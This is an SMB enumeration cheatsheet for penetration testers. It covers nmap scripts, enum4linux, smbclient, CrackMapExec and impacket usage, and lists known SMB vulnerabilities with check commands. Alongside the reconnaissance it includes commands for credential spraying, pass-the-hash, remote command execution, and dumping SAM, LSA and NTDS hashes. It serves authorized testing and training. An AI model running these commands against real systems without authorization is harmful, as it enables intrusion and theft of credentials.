SMB Enumeration Cheatsheet

Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)

Initial Scanning

nmap -p 139,445 -sV <ip>
nmap -p 445 --script smb-os-discovery <ip>
nmap -p 445 --script smb-security-mode <ip>
nmap -p 445 --script smb2-security-mode <ip>
nmap -p 139,445 --script smb-* <ip>              # All SMB scripts
nmap -p 445 --script smb-vuln-* <ip>             # All vuln checks

NetBIOS / NBT Scanning

nbtscan <ip>
nbtscan -r 192.168.1.0/24
nmblookup -A <ip>

enum4linux / enum4linux-ng

# Classic
enum4linux -a <ip>                               # All checks
enum4linux -u <user> -p <pass> <ip>              # Authenticated
enum4linux -S <ip>                               # Shares only
enum4linux -U <ip>                               # Users only
enum4linux -P <ip>                               # Password policy

# Newer (recommended)
enum4linux-ng -A <ip>
enum4linux-ng -A <ip> -u <user> -p <pass>
enum4linux-ng -A <ip> -oA output

smbclient

# List shares
smbclient -L //<ip>/ -N                          # Null session
smbclient -L //<ip>/ -U <user>%<pass>            # Authenticated

# Connect to share
smbclient //<ip>/<share> -N
smbclient //<ip>/<share> -U <user>%<pass>
smbclient //<ip>/<share> -U <domain>/<user>%<pass>

# Within smbclient shell
ls                    # List files
cd <dir>              # Change directory
get <file>            # Download file
put <file>            # Upload file
recurse ON            # Enable recursive operations
prompt OFF            # Disable prompts
mget *                # Download everything
mput *                # Upload everything

CrackMapExec (CME)

# Basic info
crackmapexec smb <ip>
crackmapexec smb 192.168.1.0/24

# Authenticated enum
crackmapexec smb <ip> -u <user> -p <pass>
crackmapexec smb <ip> -u <user> -p <pass> --shares
crackmapexec smb <ip> -u <user> -p <pass> --users
crackmapexec smb <ip> -u <user> -p <pass> --groups
crackmapexec smb <ip> -u <user> -p <pass> --sessions
crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users
crackmapexec smb <ip> -u <user> -p <pass> --local-groups

# Credential spraying
crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success

# Pass-the-Hash
crackmapexec smb <ip> -u <user> -H <nthash>

# Command execution
crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami'       # CMD
crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami'       # PowerShell

# Dump SAM/LSA
crackmapexec smb <ip> -u <user> -p <pass> --sam
crackmapexec smb <ip> -u <user> -p <pass> --lsa
crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil       # NTDS.dit

impacket Tools

python3 smbclient.py <domain>/<user>:<pass>@<ip>
python3 samrdump.py <domain>/<user>:<pass>@<ip>
python3 rpcdump.py <domain>/<user>:<pass>@<ip>
python3 lookupsid.py <domain>/<user>:<pass>@<ip>
python3 secretsdump.py <domain>/<user>:<pass>@<ip>      # Dump all hashes
python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip>

Mounting SMB Shares

# Linux mount
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain>

Key Vulnerabilities

CVE	Name	Description
CVE-2017-0144	EternalBlue / MS17-010	SMBv1 RCE — WannaCry / NotPetya
CVE-2020-0796	SMBGhost	SMBv3.1.1 compression RCE
CVE-2021-34527	PrintNightmare	Print Spooler RCE via SMB

# EternalBlue check
nmap -p 445 --script smb-vuln-ms17-010 <ip>
use auxiliary/scanner/smb/smb_ms17_010

# SMBGhost check
nmap -p 445 --script smb-vuln-cve2020-0796 <ip>
use auxiliary/scanner/smb/cve_2020_0796_smbghost

SMB Enumeration Cheatsheet#

Initial Scanning#

NetBIOS / NBT Scanning#

enum4linux / enum4linux-ng#

smbclient#

CrackMapExec (CME)#

impacket Tools#

Mounting SMB Shares#

Key Vulnerabilities#

SMB Enumeration Cheatsheet

Initial Scanning

NetBIOS / NBT Scanning

enum4linux / enum4linux-ng

smbclient

CrackMapExec (CME)

impacket Tools

Mounting SMB Shares

Key Vulnerabilities